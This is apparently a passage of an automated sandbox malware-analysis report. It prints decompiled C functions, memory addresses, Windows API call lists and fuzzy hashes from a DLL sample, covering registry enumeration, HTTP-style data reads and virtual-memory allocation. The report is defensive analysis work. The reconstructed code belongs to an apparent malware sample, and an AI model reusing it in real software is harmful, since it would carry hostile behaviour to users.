				long _t52;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0x1c1a144(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E01C12114(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x1c1a2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E01C12C11(_v20);
							if(_v8 == 0) {
								_t52 = E01C14E7A(_v24, _t64); // executed
								_v8 = _t52;
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}




















                0x01c12719
                0x01c1271c
                0x01c12725
                0x01c12728
                0x01c1272b
                0x01c12733
                0x01c12831
                0x01c1283c
                0x01c1283f
                0x01c12847
                0x01c1284e
                0x01c1284e
                0x01c12841
                0x01c12844
                0x01c12844
                0x00000000
                0x01c12844
                0x01c1273c
                0x00000000
                0x00000000
                0x01c12749
                0x01c12751
                0x01c12828
                0x00000000
                0x01c12828
                0x01c1275d
                0x01c12764
                0x01c12767
                0x01c12816
                0x01c1281d
                0x01c1281d
                0x01c12823
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01c1276d
                0x01c1276d
                0x01c1276d
                0x01c1276d
                0x01c12772
                0x01c12774
                0x01c12774
                0x01c12781
                0x01c12789
                0x00000000
                0x00000000
                0x01c1278b
                0x01c12798
                0x01c1279e
                0x01c1279e
                0x01c127a1
                0x00000000
                0x00000000
                0x01c127ae
                0x01c127c2
                0x01c127f8
                0x01c127fb
                0x01c127fe
                0x01c12806
                0x01c1280c
                0x01c12811
                0x01c12811
                0x00000000
                0x01c12806
                0x01c127c4
                0x01c127cb
                0x01c127d3
                0x00000000
                0x00000000
                0x01c127d5
                0x01c127e0
                0x01c127e3
                0x00000000
                0x01c127ea
                0x01c127ea
                0x00000000
                0x01c127ea
                0x01c127e3
                0x01c127ab
                0x00000000
                0x01c127ed
                0x01c127ed
                0x00000000

                APIs
                • GetLastError.KERNEL32 ref: 01C12831
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetLastError.KERNEL32 ref: 01C127A5
                • WaitForSingleObject.KERNEL32(00000000), ref: 01C127B5
                • GetLastError.KERNEL32 ref: 01C127D5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                • String ID:
                • API String ID: 35602742-0
                • Opcode ID: 3ffdb3adc87c1349b4f8d5bcbea0e004c07767cb037ad75aaf0e4758bb3b6f4e
                • Instruction ID: 346912650c1c525103c74289b459e006f709da2997c7d707a89ad144f05d6fd7
                • Opcode Fuzzy Hash: 3ffdb3adc87c1349b4f8d5bcbea0e004c07767cb037ad75aaf0e4758bb3b6f4e
                • Instruction Fuzzy Hash: 23412179D40209EFDF21DF99C984AAEBBB8FB0A344B204469E502E7155D730DF40EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11900 Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C11900(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E01C12114(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E01C12C11(_v28);
							goto L17;
						}
						_t42 = E01C11B78(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E01C12C11(_v24);
						_v20 = _v16;
						_t47 = E01C12114(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x1c1a2c4, 0) == 0x102);
				goto L16;
			}

















                0x01c11900
                0x01c1191a
                0x01c1191d
                0x01c11920
                0x01c11923
                0x01c11926
                0x01c1192c
                0x01c11930
                0x01c11a0a
                0x01c11a0e
                0x01c11a0e
                0x01c11939
                0x01c11940
                0x01c11947
                0x01c1194a
                0x01c119ff
                0x01c11a02
                0x00000000
                0x01c11a08
                0x01c11950
                0x01c11953
                0x01c1195a
                0x01c11964
                0x01c1196d
                0x01c11973
                0x01c1197b
                0x01c119b3
                0x01c119ed
                0x01c119f3
                0x01c119f5
                0x01c119f5
                0x01c119f7
                0x01c119fa
                0x00000000
                0x01c119fa
                0x01c119c8
                0x01c119cd
                0x01c119d1
                0x00000000
                0x00000000
                0x00000000
                0x01c119d1
                0x01c11980
                0x01c1198f
                0x00000000
                0x00000000
                0x01c11994
                0x01c1199d
                0x01c119a0
                0x01c119a7
                0x01c119aa
                0x01c11985
                0x01c11985
                0x00000000
                0x01c11985
                0x01c119ae
                0x00000000
                0x01c119ae
                0x01c11982
                0x00000000
                0x01c119d3
                0x01c119e0
                0x00000000

                APIs
                • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11926
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • RegEnumKeyExA.KERNELBASE(?,?,?,01C161AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01C161AC), ref: 01C1196D
                • WaitForSingleObject.KERNEL32(00000000,?,?,?,01C161AC,?,01C161AC,?,?,?,?,?,01C161AC,?), ref: 01C119DA
                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11A02
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                • String ID:
                • API String ID: 3664505660-0
                • Opcode ID: 6f115653c2daeb94699f441d42657a81c36530139f5828d3bda292eebc7c212d
                • Instruction ID: 66930933afbad19f604409eab6fae93e85d15f81792c4d231d047c14f8bdb169
                • Opcode Fuzzy Hash: 6f115653c2daeb94699f441d42657a81c36530139f5828d3bda292eebc7c212d
                • Instruction Fuzzy Hash: 83318376C8015AFBDF219FE9CC459EEFFB9FB56300F144166E621B2154D2748A40EB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12C2D Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 01C12C84
                • SysAllocString.OLEAUT32(01C11C26), ref: 01C12CC7
                • SysFreeString.OLEAUT32(00000000), ref: 01C12CDB
                • SysFreeString.OLEAUT32(00000000), ref: 01C12CE9
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 67d40ef1ae76db2a0f975a166b1a117cdd51057cb121d57c17cc40ff188ff0ef
                • Instruction ID: 9379056488c49d2a7b150fa3b1f1412fad6f5f024a5144b42ad702d853f4cabc
                • Opcode Fuzzy Hash: 67d40ef1ae76db2a0f975a166b1a117cdd51057cb121d57c17cc40ff188ff0ef
                • Instruction Fuzzy Hash: 10314A7594014AEFDB01DFD8C8D08EE7BB4BF49340B20802EEA0A97214E771DA85DF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1611C Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E01C1611C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E01C12031(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E01C15E26(_t23);
						}
					}
					return _t38;
				}
				_t26 = E01C13B1B(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x1c1a304, 1, 0,  *0x1c1a3a4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E01C11900(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E01C11B78(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E01C173B2(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E01C157E8( &_v32, _t39);
					goto L13;
				}
			}














                0x01c1611c
                0x01c16129
                0x01c1612f
                0x01c16130
                0x01c16131
                0x01c16132
                0x01c16133
                0x01c16137
                0x01c1613e
                0x01c16143
                0x01c16147
                0x01c161cf
                0x01c161cf
                0x01c161d2
                0x01c161d4
                0x01c161dc
                0x01c161e2
                0x01c161e5
                0x01c161e5
                0x01c161e2
                0x01c161f0
                0x01c161f0
                0x01c16153
                0x01c1615a
                0x01c1615c
                0x01c1615c
                0x01c16173
                0x01c16177
                0x01c1617a
                0x01c16185
                0x01c1618c
                0x01c1618c
                0x01c16198
                0x01c16199
                0x01c161a7
                0x01c1619b
                0x01c1619b
                0x01c1619c
                0x01c1619d
                0x01c1619e
                0x01c1619f
                0x01c161a0
                0x01c161a0
                0x01c161ac
                0x01c161b1
                0x01c161b3
                0x01c161b5
                0x01c161b5
                0x01c161bc
                0x00000000
                0x01c161be
                0x01c161be
                0x01c161cb
                0x00000000
                0x01c161cb

                APIs
                • CreateEventA.KERNEL32(01C1A304,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 01C1616D
                • SetEvent.KERNEL32(00000000), ref: 01C1617A
                • Sleep.KERNELBASE(00000BB8), ref: 01C16185
                • CloseHandle.KERNEL32(00000000), ref: 01C1618C
                  • Part of subcall function 01C11900: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11926
                  • Part of subcall function 01C11900: RegEnumKeyExA.KERNELBASE(?,?,?,01C161AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01C161AC), ref: 01C1196D
                  • Part of subcall function 01C11900: WaitForSingleObject.KERNEL32(00000000,?,?,?,01C161AC,?,01C161AC,?,?,?,?,?,01C161AC,?), ref: 01C119DA
                  • Part of subcall function 01C11900: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11A02
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                • String ID:
                • API String ID: 891522397-0
                • Opcode ID: 3228944fe5720436add95bd9879e9f65e77ef4bf7932fcf60236e14485d42253
                • Instruction ID: 6d68bdd2a6d43b269b795aa420e3bb9024077497218b329c28a8e2eb68a559fd
                • Opcode Fuzzy Hash: 3228944fe5720436add95bd9879e9f65e77ef4bf7932fcf60236e14485d42253
                • Instruction Fuzzy Hash: E221DA73980229EFDF20AFE8C8809DE777DBF17254B154425EB12A7109D774DA41E760
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C155E9 Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C155E9(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E01C12114(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E01C12C11(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E01C11863(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                0x01c155f5
                0x01c15618
                0x01c15622
                0x01c15628
                0x01c1562c
                0x01c15644
                0x01c15649
                0x01c15691
                0x01c1564b
                0x01c15653
                0x01c15657
                0x01c1568e
                0x01c15659
                0x01c1566b
                0x01c1566f
                0x01c15685
                0x01c15671
                0x01c15674
                0x01c15676
                0x01c1567b
                0x01c15680
                0x01c15680
                0x01c1567b
                0x01c1566f
                0x01c15657
                0x01c15699
                0x01c15699
                0x01c156a0
                0x01c156a6
                0x01c156a6
                0x01c1560e
                0x01c15612
                0x00000000
                0x00000000
                0x00000000

                APIs
                • RegOpenKeyW.ADVAPI32(80000002,02179BFE,02179BFE), ref: 01C15622
                • RegQueryValueExW.KERNELBASE(02179BFE,?,00000000,80000002,00000000,00000000,?,01C11C57,3D01C190,80000002,01C161AC,00000000,01C161AC,?,02179BFE,80000002), ref: 01C15644
                • RegQueryValueExW.ADVAPI32(02179BFE,?,00000000,80000002,00000000,00000000,00000000,?,01C11C57,3D01C190,80000002,01C161AC,00000000,01C161AC,?,02179BFE), ref: 01C15669
                • RegCloseKey.ADVAPI32(02179BFE,?,01C11C57,3D01C190,80000002,01C161AC,00000000,01C161AC,?,02179BFE,80000002,00000000,?), ref: 01C15699
                  • Part of subcall function 01C11863: SafeArrayDestroy.OLEAUT32(00000000), ref: 01C118E8
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                • String ID:
                • API String ID: 486277218-0
                • Opcode ID: db982d72bbccc6c3aa617c232493d1b47fb8ad6ec115259dfa3362e16bd2954a
                • Instruction ID: 2b45ff7bcb2b3d86305ec519f5309cb6545bd1d428d12d6de27dc40ca1ec330f
                • Opcode Fuzzy Hash: db982d72bbccc6c3aa617c232493d1b47fb8ad6ec115259dfa3362e16bd2954a
                • Instruction Fuzzy Hash: 682130B244025EFFDF129E94EC80CEE7B69FB46250B058825FE1597214D231DD60EBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CF9EA Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                Download Yara Rule
                APIs
                • RegQueryValueExA.KERNELBASE(046DE99E,?,00000000,046DE99E,00000000,046DE9AE,046DE99E,?,?,?,?,046DA359,80000001,?,046DE99E,046DE9AE), ref: 046CFA0F
                • RtlAllocateHeap.NTDLL(00000000,046DE9AE,00000000), ref: 046CFA26
                • HeapFree.KERNEL32(00000000,00000000,?,046DA359,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001,?,046DE99E), ref: 046CFA41
                • RegQueryValueExA.KERNELBASE(046DE99E,?,00000000,046DE99E,00000000,046DE9AE,?,046DA359,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001), ref: 046CFA60
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateFree
                • String ID:
                • API String ID: 4267586637-0
                • Opcode ID: 3060edd133b235bbebf8c90aa65393fc63480cdddc4cea3f7f178fbf4a1f79de
                • Instruction ID: 78c365829043d2a7de83777a4d5fe8b6853c916e37175cee6cb9fc4494b3b699
                • Opcode Fuzzy Hash: 3060edd133b235bbebf8c90aa65393fc63480cdddc4cea3f7f178fbf4a1f79de
                • Instruction Fuzzy Hash: 9D114FB6500118FFDB12DF85DC84CEEBFBDEB88750B10406AF901A7250E6716E51DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CFDC6 Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDE5
                • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDF0
                • _wcsupr.NTDLL ref: 046CFDFD
                • lstrlenW.KERNEL32(00000000), ref: 046CFE05
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                • String ID:
                • API String ID: 2533608484-0
                • Opcode ID: d1245944672891463d6467e5e7f6c3a0c918930b6a1bc9d713681a50551f0b6b
                • Instruction ID: 3d070810176818f2df2ae7af4c5351c4a15198ec134e5dc3d46341523a17d1ff
                • Opcode Fuzzy Hash: d1245944672891463d6467e5e7f6c3a0c918930b6a1bc9d713681a50551f0b6b
                • Instruction Fuzzy Hash: A7F05931201212BFA3227E326C8CE7F16ADEF99BA5B10092CF401DB181FF69EC0141A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E3A35 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                Download Yara Rule
                APIs
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046E3A54
                  • Part of subcall function 046D87CD: RtlEnterCriticalSection.NTDLL(00000000), ref: 046D87D9
                  • Part of subcall function 046D87CD: CloseHandle.KERNEL32(?), ref: 046D87E7
                  • Part of subcall function 046D87CD: RtlLeaveCriticalSection.NTDLL(00000000), ref: 046D8803
                • CloseHandle.KERNEL32(?), ref: 046E3A62
                • InterlockedDecrement.KERNEL32(046EE0DC), ref: 046E3A71
                  • Part of subcall function 046CE024: SetEvent.KERNEL32(0000043C,046E3A8C), ref: 046CE02E
                  • Part of subcall function 046CE024: CloseHandle.KERNEL32(0000043C), ref: 046CE043
                  • Part of subcall function 046CE024: HeapDestroy.KERNELBASE(048A0000), ref: 046CE053
                • RtlExitUserThread.NTDLL(00000000), ref: 046E3A8D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                • String ID:
                • API String ID: 1141245775-0
                • Opcode ID: ac2b44390b75d131e9b210a69094fcf24c7627ac103cc68a9c25356bd6d8dfcc
                • Instruction ID: 53f460b9dd5054b134341dc5c1cab923bdba8e863e2812f59c60c598352ae3e9
                • Opcode Fuzzy Hash: ac2b44390b75d131e9b210a69094fcf24c7627ac103cc68a9c25356bd6d8dfcc
                • Instruction Fuzzy Hash: B6F04434541204AFE7056F6AD80DA7A3BF8EB45730B100218F521A73C0FA79AD418BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C3B19 Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046C3B3F
                • memcpy.NTDLL ref: 046C3B67
                  • Part of subcall function 046E3E7D: NtAllocateVirtualMemory.NTDLL(046D6359,00000000,00000000,046D6359,00003000,00000040), ref: 046E3EAE
                  • Part of subcall function 046E3E7D: RtlNtStatusToDosError.NTDLL(00000000), ref: 046E3EB5
                  • Part of subcall function 046E3E7D: SetLastError.KERNEL32(00000000), ref: 046E3EBC
                • GetLastError.KERNEL32(00000010,00000218,046E6D9D,00000100,?,00000318,00000008), ref: 046C3B7E
                • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,046E6D9D,00000100), ref: 046C3C61
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                • String ID:
                • API String ID: 685050087-0
                • Opcode ID: 61f518e0d114ccf5d1b277112e40f79593a4f5e9095f360c59aad5ddd112a252
                • Instruction ID: 85969e21767c8c37ee0981f4bfb0b8efcca7d6c42d4ea20f6a754282b6888aa8
                • Opcode Fuzzy Hash: 61f518e0d114ccf5d1b277112e40f79593a4f5e9095f360c59aad5ddd112a252
                • Instruction Fuzzy Hash: B94192B1644305AFD720DF25CC41FABB7E8EB98314F00892DF999C6290F730E5558BA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11442 Relevance: 4.6, APIs: 3, Instructions: 96COMMON
                Download Yara Rule
                C-Code - Quality: 18%
                			E01C11442(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t64;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t62 = __esi + 0x2c;
				_v16 = 0;
				 *_t62 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t62);
				_t63 = __imp__; // 0x6f99fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t63() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E01C12114(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t63() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t64 = E01C12114(_v8 + 1);
							if(_t64 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t64, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t64;
							}
						}
						E01C12C11(_v20);
					}
					goto L12;
				}
			}












                0x01c11448
                0x01c11451
                0x01c11454
                0x01c11457
                0x01c11459
                0x01c1145c
                0x01c1153d
                0x01c11543
                0x01c11543
                0x01c11466
                0x01c1146d
                0x01c11475
                0x01c11534
                0x01c1153a
                0x00000000
                0x01c1153a
                0x01c1147e
                0x01c11482
                0x01c11483
                0x01c11484
                0x01c1148a
                0x01c1148b
                0x01c11490
                0x01c11497
                0x00000000
                0x01c1149d
                0x01c114ac
                0x01c114af
                0x01c114b2
                0x01c114bb
                0x01c114c2
                0x01c114c5
                0x01c1152b
                0x01c114c7
                0x01c114ca
                0x01c114ce
                0x01c114cf
                0x01c114d0
                0x01c114d1
                0x01c114d3
                0x01c114da
                0x01c1151e
                0x01c114dc
                0x01c114dc
                0x01c114e5
                0x01c114f3
                0x01c114f7
                0x01c1150f
                0x01c114f9
                0x01c11502
                0x01c1150a
                0x01c1150a
                0x01c114f7
                0x01c11524
                0x01c11524
                0x00000000
                0x01c114c5

                APIs
                • GetLastError.KERNEL32 ref: 01C11534
